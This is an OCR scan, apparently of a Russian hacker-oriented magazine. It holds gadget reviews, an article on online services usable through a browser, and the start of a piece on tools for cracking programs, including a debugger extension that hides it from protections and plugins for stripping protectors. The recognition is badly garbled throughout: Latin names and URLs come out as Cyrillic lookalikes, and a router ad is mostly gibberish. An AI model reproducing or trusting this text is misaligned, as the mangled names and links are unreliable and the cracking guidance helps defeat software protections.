2. Чтобы использовать МВТ-ЗА120, достаточно подключить передат- 
чик к любому стандартному аудиовыходу и включить его, ну, и науш- 

пники, конечно. 

3. Для начала работы с этим устройством тебе не понадобится штуди- 
ровать инструкцию. Все управление очень простое, афункциональных 
кнопок ничтожно мало. 

4. Акк умуляторы девайса заряжаются с помощью прилагаемого в ком- 
■плекте зарядного устройства. 



^ 5. Звук из наушников приличного качества. 

1 ^6. Мизіек МВТ-ЗА120 из-за пластикового корпуса имеет небольшой 



веси поэтому не вызывает дискомфорт при ношении. 

7. Громкость регулируется прямо на девайсе при помощи кнопок «+» 
и «-». 

8. Встроенный микрофон также поможеттебе при опііпе-общении. 

9. Устройство предназначено для ношения на шее, а не на голове, что 
для многих более удобно. 



1 . Из минусов следует отметить невозможность заменить севший акку- 



мулятор, так как он встроенный. 




Р 



І_еасИек ОТіпГазІ ТѴ Рго II 



Апгрэйд монитора до телевизора 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 
ТѴ-форматы: РАІ_, ЗЕСАМ 

Разъемы: Аисііо-Іп, І_іпе Іп, Зреакег, Э-ЗиЬ, ѴОА Іп, Ѵісіео Оиі, Ѵібео Іп, 
антенный 

Разрешение: от 640X480 до 1 280x1 024 



1 . Установить это устройство очень просто — не требуется ни инстал- 
ляции драйверов, ни каких-то других действий. Просто подсоединил 
его к своему дисплею — и все. 

2. Радуют небольшие габариты и вес, стильный внешний вид. В ком- 
плект поставки входит подставка для установки на бок. 

3. Управлять тюнером можно только с помощью экранного меню и кно- 
пок на пульте ДУ и корпусе девайса. 

4. Может подключаться как к ОРТ, так и к І_СЭ-мониторам, а также к 
проекторам и плазменным панелям. При этом поддерживает соотно- 
шения сторон 4:3 и 16:9. 

5. Поддерживает стереозвук, так что с ним не только хорошо смотрит- 
ся, но и слышится. 

6. Имеется таймер выключения, что очень удобно. 

7. Можно задать несколько своих любимых каналов и легко переклю- 




чаться между ними. 




1 . Нельзя управлять тюнером посредством софта, нельз я записывать 1 
изображение или видео на комп. 

2. Поскольку І_еасІіек ѴѴіпРазі ТѴ Рго II подключается между монитором 
и видеокартой, т о в некоторых случаях это может ухудшить сит ал с 
видеоадаптера] 
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Домашний 
интернет- центр 

для Интернета 
и Е^фропогоТВ 
Р- 660 НШ 



Разведение Интернета 
в домашних условиях 



И н і орна і а а ди-.мо киа і и і вСйм . 

Настольному компьютеру П ДОТСКОЙ 

кюмняге, приггтяакр дпя прнамя 
ин і йрак і ивчоі о 1 олуыиды чин 
в гостиной, беспроводному ноутбуку 
я кдбин*=гпе... Интернет- центры 
р-веонти Р-& 30 НТЛ' компании 2 уКЕІ_ 
йбьЮцимяіОі и ООіь зСгОдОміштОіО 
компьютерную тоиьику ы ю по-иощыо 
пврБсклассного встроенного модема 
АРЕі_ 2 - 1 Юд ю іюнаю і оо к Ин і йр нй і у 
но екорос _ и : дсстрто'іной др»? для 
телевидения высокой четкости. 



Цифуоыше фшйі рафии, музыка 
и фиг ьмы ^ 5 удут доступны 
р каждом уголке пятаго дома, пел 
ннд-ахной ааши і ой о і а і ак и краки 
информации. Бпсрпые для настройки 
[і-рарпяпнпюти л яьнолр и Интернет 
но нужно ыііьшаі ьон в пахничеикиа 
іЮцрО-онКі а .или иыЭыиаіь ми дОм 
ГіПРІ ІМЯГИСТЯ. В ЛЮбоН ТЮЧКе РОССИИ 
деетжточно выбрать при вайдвра 
АРЗІ_ и іариф из списка, а ысй 
эсгпрпьнгъе ар арг: сделяпт уникрпьнлд 
текнопогмя 2 уКЕІ_ Ые 1 Рпеп«± 



■ ПоСіонннйа и надажное 
Д 05 Ьсоелнненио Ю Интернетом 
ня окорпегти до 24 Мбнт/п 

при СноОолном гйлйфоны 

■ подключение до трек компьютеров 

кТВ-приптяики с ■ одновременным 
выходом а Ин іернеі 

■ Пел и дм і Ю'Дцоржкд и м і ерак і к имеі е 
I цифрового ТЙЛЮЬИЛР-НИЯ 

■ Настройка А.ПЕІ_-услуг 

и Оеаом-асносі и домашней се іи 
а е-витрчы^ минуть 

■ Щі-Р для Бвспрс-воднык ноутбуков 




ЬиСіран 

ЧНСУГ|ЮИ<Н 

н^іРпепс 1 



Ріпгг гит 1 1;: ^ ■:«|і^-і;ін .інііип 7 уЧ Р -І 

таы ыэ-ваае, а -:вииі аоо-йэаа 

;л I І'ІІ.У ИаМІ .т _с 





ТЫ ЗАМЕЧАЛ, ЧТО, НЕ ИМЕЯ ПОД РУКОЙ НАБОРА ЛЮБИМОГО СОФТА, ВСЕГДА РИСКУ- 
ЕШЬ ПОПАСТЬ ВПРОСАК? ЛЮБАЯ МЕЛОЧЬ, НА КОТОРУЮ ДОМА ПОТРАТИЛ БЫ МИНУТУ- 
ДРУГУЮ, В ДРУГОМ МЕСТЕ ОКАЗЫВАЕТСЯ НЕВЫПОЛНИМОЙ. ОСОБЕННО НЕПРИЯТНО, 
КОГДА ИЗ-ЗА ОТСУТСТВИЯ НУЖНОЙ ПРОГРАММЫ ПРИХОДИТСЯ ОТКАЗЫВАТЬ ПОПРО- 
СИВШЕМУ О ПОМОЩИ ЧЕЛОВЕКУ. ОН, КОНЕЧНО, СДЕЛАЕТ ВИД, ЧТО ВСЕ В ПОРЯДКЕ, 
НО ПРО СЕБЯ ОБЯЗАТЕЛЬНО ПОДУМАЕТ: «ПФФ. ТОЖЕ МНЕ ХАКЕР — ТАКУЮ ЕРУНДУ 
СДЕЛАТЬ НЕ МОЖЕТ». ЧТОБЫ ТАКИХ СИТУАЦИЙ БЫЛО КАК МОЖНО МЕНЬШЕ, РЕКО- 
МЕНДУЮ ВЗЯТЬ НА ВООРУЖЕНИЕ НОВЫЙ КЛАСС ПРОГРАММ — ОНЛАЙНОВЫХ. 

ОНИ НЕ ТРЕБУЮТ УСТАНОВКИ, ВСЕГДА ДОСТУПНЫ В ИНТЕРНЕТЕ И ЗАЧАСТУЮ СПРАВ- 
ЛЯЮТСЯ С ЗАДАНИЯМИ НИЧУТЬ НЕ ХУЖЕ ОБЫКНОВЕННЫХ СОБРАТЬЕВ. 



КАК ВЫЖИТЬ В СИСТЕМЕ, ИМЕЯ ТОЛЬКО БРАУЗЕР 



СТЕПАН «ЗТЕР» ИЛЬИН 

/ 8ТЕР@САМЕЬАЫО.НЦ / 



бщѳниѳ по электронной почте — 
затея довольно неоднозначная. 
С одной стороны, использовать 
ее жутко неудобно из-за огромных задер- 
жек, тонны спама, а также прожорливых 
спам-фильтров, которые, в конец обалдев 
от лояльности администратора, стали при- 
нимать за рекламу все подряд, включая важ- 
ные письма. С другой стороны, без нее тоже 
не обойтись, и даже для того, чтобы заре- 
гистрироваться на новом форуме, придется 
пройти проверку пое-таіі. Так что почтовый 
клиент все-таки нужен. Лучшим онлайн-сер- 
висом, предоставляющим доступ к почте, 
сегодня по праву считается детище Ооодіе’а 
— Отаіі.сот . В списке возможностей — что 
ни пункт, то козырь. Интерактивный интер- 
фейс, построенный с использованием тех- 
нологии А^Х (подробнее о ней читай в РАО’е 
этого номера), подгружает только нужную 
часть страницы, поэтому взаимодействие с 
сервером гладкое и непрерывное (замечу, 
что большинство сервисов в обзоре будут 
построены натом же принципе). Все письма 
удобно выстраиваются в цепочки по теме и 
надежнохранятся насервере. Особенно ра- 
дует продвинутая системафильтров, позво- 



ляющая навести порядок в корреспонден- 
ции. Если мессаги от разных получателей 
автоматически раскидывать по специально 
созданным папкам, то ориентироваться 
среди нихстанетнамного удобнее. Впрочем, 
даже если придется что-то искать, то на по- 
мощь придет поисковый механизм Ооодіе. 
Секунда поиска и максимально верный ре- 
зультат — сомневаться в нем будет разве что 
ненормальный. Размерящика — 2762,441465 
Мб (на момент написания статьи) — хватит, 
чтобы целиком разместитьЗфильмавхоро- 
шем качестве. Кстати, сам Ооодіе не против 
подобной инициативы — храни, что хочешь. 
Единственная загвоздка во всей схеме за- 
ключается в приглашении, которое необхо- 
димодля регистрации. Егоможновзятьу нас 
на диске, но, поскольку на всех все равно не 
хватит, поделюсь полезной ссылкой: би р:// 
соттипііѵ.ііѵеіоигпаі.сот/атаііги/ . Важно, 
что, раз зарегистрировавшись в системе, ты 
получаешь доступ не только к ОтаіІ, но и ко 
всем остальным сервисам Ооодіе’а. 

Если вдруг приспичит забрать почту с уже 
существующего ящика (например, провай- 
дерского или корпоративного), рекомендую 
воспользоваться специальным почтовым 
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клиентом, написанным на РНР. Он доступен 
по адресу: ѵѵѵѵѵѵ.ирііѵе.сот/етаіі.біті . Для 
работы требует лишь указать РОРЗ-сервер, 
имя учетной записи и пароль. Скрипт тутже 
заберет почту, предоставив содержимое 
ящика в удобном виде. Чтобы избежать воз- 
можных косяков, используй опцию «остав- 
лять письманасервере». 

Аналоги: Ѵабоо! МаіІ ( таіІ.уабоо.сопп Г 

О ТеІпе1/$$Н-кл иент 

Был у меня такой случай, когда кровь из носу 
нужно было подключиться к серверу по ЗЗН и 
подкорректировать конфиг одного из демо- 
нов. При этом на машине каким-то образом 
блокировался запуск любых недоверенных 
приложений, поэтому скачанный РиТТѴ вы- 
летал с ошибкой. Пришлось быстро искать 
альтернативу. Ей оказал сяМіпсНегтТегтіпаІ 
— целиком написанный на ЗаѵаЗЗН-клиент, 
который запускается прямо в окне браузе- 
ра. Воспользоваться им можно, перейдя по 
ссылке ѵѵѵѵѵѵ.стр.ііѵ.ас.ик/іегтіпаі/ . В зави- 
симости отбраузера, тебя по-разному могут 
предупредить о запуске потенциально опас- 
ного ^ѵа-апплета. Не сомневайся: ему мож- 
но доверять. ЗЗН-клиент откроется в новом 
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поскольку он не только позволяет быстро перемещать- 
ся по директориям, но и оперативно манипулировать 
группой файлов с помощью сопутствующих элементов 
управления. Копировать, перемещать, удалять, про- 
сматривать, изменять права доступа, архивировать, 
редактировать без закачки (с подсветкой синтаксиса 
РНР) — все это возможно через пе{2Йр. Я уже неговорю 
о скачке файлов с сервера, а также аплоада, реализо- 
ванного при помощи ^ѵа-апплета. Клиент, кроме всего 
прочего, поддерживает РХР-технологию, так что ты без 
трудасможешь напрямую передавать файлы с сервера 
надругой РТР. 

Аналог: Ьир://зигіір.сот . 




>Онлайн-серви- 
сы Ооодіе: Ооодіе 
Раде Сгеаіог ( ѵѵѵѵѵѵ. 
рааез.аоодІе.согтД 

— ѴѴ5ѴІѴѴѴО редактор 
веб-страниц. 

Ооодіе ЗргеасІзГіееіз 
( ГіДр://зргеасІзГіее1з. 
аооаІе.сотЛ — элек- 
тронные таблицы 
Ооодіе ІМоІеЬоок. 
( ѵѵѵѵѵѵ.доодіе.сот/ 
доодІепоІеЬоок ) — хра- 
нилище заметок. 

Ооодіе Саіепсіаг ( ѵѵѵѵѵѵ. 
доодІе.сот/саІепсІаіЦ 

— личный планировщик, 
онлайновый аналог М3 
ОіЛІоок. 



окне итутже потребует ввести сервер, имя пользовате- 
ля/пароль или указать ключи авторизации. После этого 
ты мигом окажешься на сервере и сможешь выполнять 
любые команды. Красота! 

Аналог: ИНрѴ/іаѵаззІп.ога/ . 

О РТР-клиент 

К сожалению, доступ к удаленному серверу по прото- 
колу ЗЗН доступен далеко не всегда. Чего не скажешь о 
РТР-аккаунте, который предоставляется везде, даже на 
самом дешевом хостинге. Отличной заменой для всех 
РТР-клиентов и в особенности стандартного виндовс- 
кого является онлайн-сервис ѵѵѵѵѵѵ.пе12іір.сопп . Закон- 
нектиться и приступить к работе наудаленном сервере 
можно сразу же, безо всякой регистрации. Достаточно 
в нужные поля формы указать сервер, порт, на котором 
он висит, а также идентификационные данные. В случае 
необходимости пользователь вполне может указать 
начальную директорию, а также включить пассивный 
режим работы с сервером. Если речь идет о передаче 
конфиденциальных данных, то уместна будет актива- 
ция ЗЗЬсоединения, которая также поддерживается 
пе!21ір. Как только окажешься внутри, будешь приятно 
удивлен, насколько здорово представлено содержимое 
сервера. Существует несколько вариантов, устанав- 
ливаемых различными скинами. Рекомендую вариант, 
когда содержимое РТР представлено в виде таблицы, 



ОМессенжер 

О том, что у ІСО есть официальный онлайновый вари- 
ант — ісц2до ( до.ісд.сот ). — знают многие. Некогда 
неплохая реализация сегодня совершенно не впе- 
чатляет: чего стоит один убогий интерфейс, который 
для каждого контакта открывает новое окно браузера 
и может свести с ума кого угодно. Да и единственный 
поддерживаемый протокол ІСО здесь явно не в кас- 
су, особенно если сидишь сразу в нескольких сетях. 
Все это я говорю потому, что у ісд2до есть отличная 
альтернатива, которая на две головы выше его по воз- 
можностям. Речь идет о сервисе тееЬо ( ѵѵѵѵѵѵ. тееЬо. 
сот/іпсІех-ги.ІіітП . Достаточно зайти на сайт, чтобы 
понять, в чем заключается первое преимущество сер- 
виса: он работает не только с ІСО, но еще и с ѴаЬоо! 
Меззепдег, сверхпопулярной на западе МЗЫ, ^Ызег 
и даже набирающей обороты ОТаІк. Если у тебя нет 
аккаунта в нужной сети, тееЬо позволяет быстро его 
завести. Вся процедура займет не более минуты. Но 
все это ерунда по сравнению с тем, что ты увидишь, 
когда залогинишься в нужные сети (да-да, можно 
подключиться сразу к нескольким). Все взаимодейс- 
твие с пользователем реализовано с помощью А^Х. 
В одном-единственном окне браузера отображается 
список контактов, и там же открываются виртуальные 
окна для переписки с другими пользователям и. Все это 
похоже на рабочий стол, с той лишь разницей, что все 




>В приложении к 
материалу на йѴй ты 
найдешь инструкции и 
документацию по соз- 
данию интерактивных 
ѴѴеЬ-приложений, 




> Онлайн-утилиты для 
сетевого администра- 
тора доступны на сайте 
ѵѵѵѵѵѵ.аІІ-пеДооІз.сот . 
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> пе12Кр позволяет выполнить точно такие 
же действия, что и обычный РТР-клиент 



ОПЕРАЦИОННЫЕ СИСТЕМЫ 
ВНУТРИ БРАУЗЕРА 

Ѳооѵѵу ( ѵѵѵѵѵѵ.дооѵѵу.сот ) предоставляет 
2 Гб для почтового ящика, календарь, ад- 
ресную книгу, ВЗЗ-аггрегатор, гигабайт 
для хранения файлов (их можно сделать 
доступными для других), игры, мессен- 
жер (ІСО, АІМ, ѴаГіоо! , МЗЫ), плрЗ-про- 
игрыватель, а также для всевозможных 
вспомогательных инструментов типа 
симпатичной панели с погодной сводкой 
(так называемые тіпі). Очень красивая 
вещь, разработанная с использованием 
АбАХиЕІазЬ. 

ОезкІорТѵѵо ( ѵѵѵѵѵѵ.сіезкіоріѵѵо.сот ) пре- 
доставляет практически идентичные 
возможности в виде почтового клиента 
(позволяющего, кстати, забирать поч- 
ту со стороннего сервера по протоколу 
РОР), удобной адресной книги, файло- 
вого хранилища на 1 Гб, мессенжера, му- 
зыкального проигрывателя, а также ре- 
дактора сайтов. Требует баѵа и девятую 
версию РІазН, но зато работаете любыми 
браузерами. 

ЕуеОЗ( ѵѵѵѵѵѵ.еуеоз.іпІо )уникальнатем.что 
распространяется с открытыми исходни- 
ками. И ты не только можешь изучить ее 
изнутри, но и открыть собственный сер- 
вер для предоставления виртуальных 
десктопов. По умолчанию каждый вир- 
туальный стол поставляется с мессен- 
жером, очень продвинутым текстовым 
редактором, а также утилитой для уста- 
новки дополнительных программ, среди 
которых есть порт-сканер, РТР-клиент и 
другие. 

ХІІМ ( ѵѵѵѵѵѵ.паІіаЬуІе.зе) до сих пор находит- 
ся в стадии бета-тестирования. Однако 
разработчики уже сейчас предоставля- 
ют тестовый доступ и утверждают, что со- 
здадут самую настоящую операционную 
систему на ѵѵеЬ-платформе. 




> Виртуальная ОС внутри браузера — уже реальность! 



окна виртуальные и относятся к мессенже- 
ру. Отличие от того же Оір'а минимальны: 
тут тоже реализован красивый интерфейс 
с графическими смайлами, настраиваются 
звуки. За подобную реализацию разработ- 
чики определенно получают «зачет». Но 
планы у них еще более грандиозные: на 
странице с описанием будущих «вкуснос- 
тей» обещается поддержка ІР-телефонии, 
функция передачи и приемафайлов, интег- 
рация со Зкуре и многое-многое другое. 
Аналог: ісц2до ( ао.ісд.сот ). 

□ Офисные приложения 

По долгу службы мне частенько приходит- 
ся работать с ѴѴогсГом. Собственно, с самой 
программой проблем обычно нет. С учетом 
всеобщей любви к пиратам в нашей стра- 
не офисный пакет от МісгозоІІ: установлен 
повсеместно. Проблема состоит в том, что 
один и тотже файл я могу править сначала 
дома, потом — в дороге на ноутбуке, затем 

— вофисеит.д. Возни кают серьезные про- 
блемы в синхронизации. А когда послед- 
него варианта вдруг не оказывается под 
рукой, я могу невзначай выйти из состоя- 
ния духовного равновесия. И тогда о какой 
творческой работе может идти речь? :) 

В общем, решением всех этих бед являет- 
ся онлайновый сервис ѴѴгііеІу ( ѵѵѵѵѵѵ.ѵѵгііеіѵ. 
сот ). Что это такое? Тот же самый ѴѴогсІ со 
всеми сопутствующими возможностями, 
только в окне браузера. Хочешь разные 
стили — пожалуйста. Таблицы, гиперс- 
сылки внутри документа, автосохранение 

— нет проблем. Можно создать новый до- 
кумент, открыть уже созданный или залить 
на сервер файл с локального компьютера 
(поддерживается бос, гК). Экспорт во все 
популярные форматы, включая РЭР, так- 
же реализован. Особенно хочу отметить 
функцию совместного редактирования (в 
том числе одновременного), которая ведет 



историю всех изменений. Ты всегда смо- 
жешь откатить любые правки и не боятся, 
что твой коллега или ты сам где-то напор- 
тачите. Чуть меньшими возможностями по 
коллективной работе обладает 2оІіо ѴѴгііег 
( ѵѵѵѵѵѵ.гоНоѵѵгііег.сот ). но зато во всем ос- 
тальном, включая интерфейс, максималь- 
но приближен к ѴѴогсГу- От тех же разра- 
ботчиков доступны проекты для создания 
презентаций — 2оІто ЗНоѵу( ѵѵѵѵѵѵ.20ітозітоѵѵ. 
сот ) и электронных таблиц — 2оНо ЗНееі 
( ѵѵѵѵѵѵ.гоНозНееІ.сот ). Прикол ьно. что эл ек- 
тронные таблицы мало чем отличаются от 
ЕхсеГевских: сервис даже предлагает ис- 
пользовать те же названия функций (а их 
болееЗОО) и похожий мастер для создания 
диаграмм и графиков. Воттак. 

Аналоги: РСКебі^ог( \А/\А/ѵѵЧскебі^ог.пе^ .аОРРІСЕ 
( ѵѵѵѵѵѵ.аоІіісе.согтЧ .ОооаІе ЗргеабзИееіз 
( зргеабзігееіз.аооаіе.сот ). 

О Музыка 

В любой системе, безусловно, установлен 
музыкальный проигрыватель. С горем по- 
полам музыку можно слушать даже через 
стандартный плеер в винде, но на чужом 
компьютере и это не выход. Ведь слушать- 
то нечего! Конечно, можно закачать пару 
ком позиций из сети, но, во-первых, этап дея 
довольно сомнительна в случае чужого 
компьютера (потратишь больше времени 
на скачку, нежели на работу), а во-вторых, 
не везде тебе их дадут скачать (вспомни о 
всевозможных фильтрах и ограничениях, 
накладываемых админами). Выход из этой 
ситуации один, но зато какой! Мгновенный 
доступ к любимой музыке ты в одночасье 
получишь, набрав в адресной строке бра- 
узера ѵѵѵѵѵѵ.рапбога.сот . Этот фантасти- 
ческий сервис позволяет создавать свои 
собственные радиостанции, соответству- 
ющие личным вкусам и предпочтениям. От 
тебя требуется лишь ввести имена испол- 
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> Онлайн-клиент тееЬо позволяет об- 
щаться сразу в нескольких сетях 



нителей или песни, которые тебе по душе 
— и тут же услышишь желаемую музыку 
из своих колонок. Причем это не обяза- 
тельно будет конкретно указанный испол- 
нитель: Рапсіога умеет подбирать схожие 
музыкальные композиции и делает это на 
самом высоком уровне. А с учетом того, 
что пользователю доступна возможность 
посмотреть полную информацию о песне, 
ты «рискуешь» открыть для себя новые 
музыкальные горизонты. Чтобы получить 
возможность сохранять свои радиостан- 
ции, необходимо использовать личный 
аккаунт. Он платный, но первые 100 часов 
предоставляются абсолютно бесплатно. 
Надо ли говорить, что количество триаль- 
ных регистраций никто не ограничивает. 
Аналоги: Іазі.Іт . 



О Сервис для хранения файлов 

Иметь при себе флешку с набором порти- 
руемых, то есть запускаемых без установ- 
ки программ, очень удобно, но как быть, 
если в нужный момент ее не окажется под 
рукой? На этот случай в закромах интерне- 
та хорошо бы организовать надежное мес- 
течко, гдеразместитьвсенеобходимое, ив 
случае чего сразу к нему обращаться. Для 
этих целей сгодился бы любой бесплатный 
хостинг, но это жутко неудобно и неэсте- 
тично. Намного приятнее юзать сервисы 
типа 2оНо РІаппег ( ѵѵѵѵѵѵ.гоііоріаппег.сот ). 
который лично для меня стал самым насто- 
ящим помощником. Дело в том, что это не 
просто место, где хранятся файлы, это не- 
что большее. Сюда ты можешь помещать 
любую информацию: маленькие заметки, 
документы и, конечно же, файлы. А бла- 
годаря тематическим меткам возможно 
даже катализировать их: в дальнейшем 
найти нужное будет очень просто. Лично 
я давным-давно залил туда весь необхо- 
димый софт и там же веду собственный 
список дел, избавившись отубогого текс- 
тового файла на флешке, которую без кон- 
ца забываю. Впрочем, если ничего, кроме 
хранения файлов, тебе не нужно, реко- 
мендую другой сервис — Отпісігіѵе ( ѵѵѵѵѵѵ. 
отпісІгіѵе.сот Ѵ Виртуальная реализация 
проводника ѴѴіпсІоѵѵз и список файлов, 
хранящихся на удаленном сервере, будут 
в этом случае уместнее. 

Аналог: Орепоту ( НирѴ/орепоту.сотЛ . 



□ Закладки 

Океан информации в интернете — это хоро- 
шо, но только когда знаешь, что с ней делать 
и как ее найти. Сохранять интересные ста- 
тьи надискуже нет смысла: ты намного быс- 
трее найдешь ту же страницу через Ооодіе. 
Но зато старая добрая система закладок до 
сих пор работает на ура. Жаль только, что у 
каждого браузера свой формат закладок, и 
уж конечно они не синхронизируются меж- 
ду разными компьютерами автоматически. 
В поиске решения этой проблемы изобре- 
тательный программист в 2003 году сделал 
сайт социальных закладок: ННрѴ/сІеІ.ісіо.из/ . 
Иначе говоря, услугу хранения закладок, 
доступных с любого компьютера, подклю- 
ченного к интернету. Несмотря на то, что 
его проект до сих пор остается наиболее 
популярным, нам он не подходит по одной 
простой причине: у него слабая поддержка 
кириллицы. Мы будем использовать более 
продвинутый сервис — ВІие Эоі (ЫиебоТиз). 
Все сохраненные закладки автоматически 
сопровождаются закэшированной копией, 
скриншотом и, кроме того, помечаются спе- 
циальными тэгами. Таким образом, можно 
найти самые популярные и востребованные 
сайты по выбранной теме среди закладок 
всехпользователей. Да-да:ты нетолькосмо- 
жешь организовывать свои собственные 
закладки, но и изучать чужие, а в них, поверь 
мне, много чего интересного. 

Аналог: Рощ ( Нир://ѵѵѵѵѵѵ.гоіо.сопп ) будет 
не только хранить закладки, но и станет 
твоим онлайн-аггрегатором ВЗЗ-лент. 

□ Виртуальная клавиатура 

Отправившись путешествовать по Евро- 
пе, мой хороший друг с удивлением обна- 
ружил, что русскихбукв наклавиатуретам 
нет. И, чтоещехуже, ему необходимо было 
написать официальное письмо в Россию, 
в котором использовать транслитерацию 
было ну совсем неуместно. Тогда я на- 
брал необходимый текст за него, а заод- 
но поделился хорошей ссылкой — ѵѵѵѵѵѵ. 
ааіе2Іпоте.сот . Это не что иное, как вир- 
туальная клавиатура, позволяющая наби- 
рать текст на любом языке мира. Нужные 
буквы набираются с помощью мыши при 
помощи изображения клавиатуры на эк- 
ране, поэтому, немного приноровившись, 
можно смело приступать к набору текста 
вслепую. Чем мой друг, собственно, и вос- 
пользовался, никогда больше не испыты- 
вая подобных проблем. 

Аналог: Иир://КІаѵа.РизѴѴіп.пеТ 




□ Операционная система 

Виртуальная ОС внутри окна браузера — это 
не просто мечта и даже не амбициозная задум- 
ка. Это реальность! Зайди насайт ѵѵѵѵѵѵ.ѵоиоз. 
сот , пройди полуминутную регистрацию 
и убедись в этом сам. Перед тобой — самый 
настоящий рабочий стол с перемещаемыми 
иконками, панелью задач, возможностью 
сменить ѵѵаіірарег. Есть и аналог меню «Пуск», 
авнем — веете же ярлыки, запускающие при- 
ложения для чтения ВЗЗ-лент и электронной 
почты, редактирования текстов, работы в ана- 
логе юниксового шелла. Разработчики сдела- 
ли платформу открытой, чтобы приложения 
могли разрабатывать другие энтузиасты. И 
таких оказалось немало: на свою виртуаль- 
ную ОС можно установить 359 всевозможных 
программ (рейтинг наиболее популярных 
здесь: ѵѵѵѵѵѵ.ѵоиоз.сот/ІпІтІ/сІеѵгапкіпаз.ІіІтП . 
Причем не какой-нибудь там ненужной ерун- 
ды! Совсем нет. В списке доступных приложе- 
ний есть добротный ЗЗН-клиент, программа 
для обмена файлами с такими же пользовате- 
лям ѴоиОЗ, эмулятор МасОЗ Хи никсов, НТМІ_- 
редактор, трЗ-проигрыватель, а также упо- 
мянутые ранее мессенжер тееЬо, 2оНоѴѴгі{ег, 
Рапсіога и т.д. Все это неудивительно, посколь- 
ку на ЬДр://ігас.ѵоиоз.сот/ доступна масса 
документации, пошаговых учебников и инст- 
рукций по созданию приложений. Остается 
только удивляться, насколько легко и удобно 
программировать под эту замечательную ОС. 
Думаю, в ближайшем будущем мы не будем 
заморачиваться по поводу миллиона новых 
умных, но мелких приложений, а будем на- 
слаждаться крупными проектами, такими 
как ѴоиОЗ. Ведь единожды настроив, ты смо- 
жешь юзать все инструменты разом и без ка- 
ких-либо ограничений. И-Е 
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КАКНЕ ПРОГРАММЫ 

И КОГДА НУЖНО 
использовать 



КРИС КАСПЕРСКИ 



ЧЕМ ВООБЩЕ ЛОМАЮТ ПРОГРАММЫ? ПРАВИЛЬНО, ГОЛОВОЙ И РУКАМИ, А ТОЛЬКО ПОТОМ СПЕЦИАЛЬНЫМИ 
ИНСТРУМЕНТАМИ. НО ПЕРВИЧНЫ ВСЕ-ТАКИ ВСПОМОГАТЕЛЬНЫЕ ПРИЛОЖЕНИЯ, ПОСКОЛЬКУ ИМЕННО ОНИ ФОРМИ- 
РУЮТ СОЗНАНИЕ, ПОЗВОЛЯЯ НАЧИНАЮЩЕМУ СДЕЛАТЬ СВОИ ПЕРВЫЕ ШАГИ В ДРЕМУЧЕМ ЛЕСУ МАШИННЫХ КОДОВ. 
ВОТТОЛЬКО ЭТИХ ПРИЛОЖЕНИЙ СЕЙЧАС НАСТОЛЬКО МНОГО, ЧТО НОВИЧОК, ПОПАВШИЙ НА ХАКЕРСКИЙ САЙТ, 
НАЧИНАЕТ ТЕРЯТЬСЯ: ЧТО НАДО КАЧАТЬ, А ЧТО НЕ НАДО. НИЧЕГО, МЫ ЭТО ИСПРАВИМ. 




ачнѳм, как водится, с отладчика. 
Лучший отладчик всех времен 
и народов — это, конечно же, 
зоіі-ісе, на котором выросло не одно по- 
коление хакеров. Это интерактивная про- 
грамма с развитым командным интерфей- 
сом, представляющим собой компромисс 
между легкостью освоения и удобством 
использования. Другими словами, руково- 
дство читать обязательно. Никаких интуи- 
тивно-понятных менюшек в стиле ТигЬо- 
ЭеЬиддег здесь не будет. 

Изначально созданный фирмой КІиМеда, 
зоД-ісе был продан компании Сотриѵѵаге, 
долгое время распространяющей его в со- 
ставе уродливого {гатеѵѵогк'а ЭгіѵегЗіисІіо. 
3 апреля 2006 по малопонятным причинам 
компания объявила о прекращении рабо- 
ты над продуктом, похоронив тем самым 
уникальнейший проект. Последняя версия 
Эгі ѵегЗФбіо 3.2 поддерживает всю линейку 
ѴѴіпсІоѵѵз, вплотьдоЗегѵег 2003, атакжеар- 
хитектуру АІѴЮ х86-64. То есть лет на пять 
запаса прочности у зоД-ісе еще должно 
хватить, атам... мы что-нибудь придумаем. 
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Найти зоД-ісе можно на любом хакерском 
сайте или в Осле. Чтобы не качать всю су- 
дию целиком (это же без малого 200 мет- 
ров), можно воспользоваться пакетом 
РеМоІХІіХ'а/ геѵегзіпа.киІісІікі.пеД . содержа- 
щим в себе один лишь зой-ісе, выдернутый 
из Ргіѵег Зіисііо ѵ2.7 ЬиіІсІ 562 и занимающий 
всего 2,27 Мб. Однако инсталлятор содер- 
житошибки, астарая версия не поддержи- 
вает новых веяний Місгозоіі (хотя замеча- 
тельно идетпод ѴѴ2К — я вообще работаюс 
ЬиіІсГом 334 и вполне им доволен). 

Вместе с зой-ісе желательно сразу же уста- 
новить ІсеЕхі ( зоигсеіогае.пеі/ргоіесіз/ 
ісеехР — неофициальное расширение, 
позволяющее скрывать отладчик от взо- 
ра большинства защит, дампить память, 
задействовать кириллические кодировки 
866/1251, приостанавливать потоки и делать 
множество других вещей (например, играть 
в тетрис). Удачно дополняет ІсеЕхі другое 
неофициальное расширения для зой-ісе — 
ІсеРитр ( ргоагаттегзіооіз.ога/зѵзіет/іііез? 
ІіІе=ісесІитр6.026.2Ір Г 
Кстати, сам зой-ісе замечательно работает 



под виртуальной машиной ѴМ ѴѴаге. Для 
этого достаточно добавить в ѵтх-файл 
пару строк: раеѵт = ТЫІЕ и ргосеззогі. 
изе = РАІ_5Е. Отмечены проблемы с мно- 
гоядерными и НТ-процессами (хотя и не 
у всех). Лечится путем отрубания всего 
этого хозяйства через добавление клю- 
ча /ОМЕСРЫ в файл Ьооі. іпі. 

Кроме зой-ісе, существуют и другие отлад- 
чики, из которых хотелось бы отметить бес- 
платный ОІІу-ЭеЬиддег ( ѵѵѵѵѵѵ.оІІѵсІЬа.сІе Г 
Это удобный инструмент прикладного уров- 
ня, ориентированный на хакерские нужды, 
поддерживающий механизм плагинов и 
собравший вокруг себя целое сообщес- 
тво, написавшее множество замечатель- 
ных расширений и дополнений, прячущих 
ОІІуЭЬд от глаз защит, автоматически опре- 
деляющих оригинальную точку входа в упа- 
кованной программе, облегчающих снятие 
протекторов и т.д. 

Неплохую коллекцию плагинов можно найти 
на ѵѵазт'е и на ѵѵѵѵѵѵ.орепгсе.ога . а также на 
нашем диске. 

Самый свежий (и пока еще во многом экс- 
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> Декомпилятор ОеОе ломает НТТРРгоху 



периментальный) ядерный отладчик — это, бесспор- 
но, ЗУЗЕР ( уууууу.зузегзоН.сот ). выпущенный нашими 
китайскими братьями и в настоящее время пережи- 
вающий стадию активного р азвития и становле- 
ния. Кроме него, довольно много народа использует 
МісгозоИ ѴѴіпЭеЬ, входящим в состав бесплатного на- 
бора ЭеЬиддіпд Тооіз. Он вполне пригоден для взлома, 
только уж очень неудобен для тех, кто привык к черному 
экрану зоіі-ісе. 

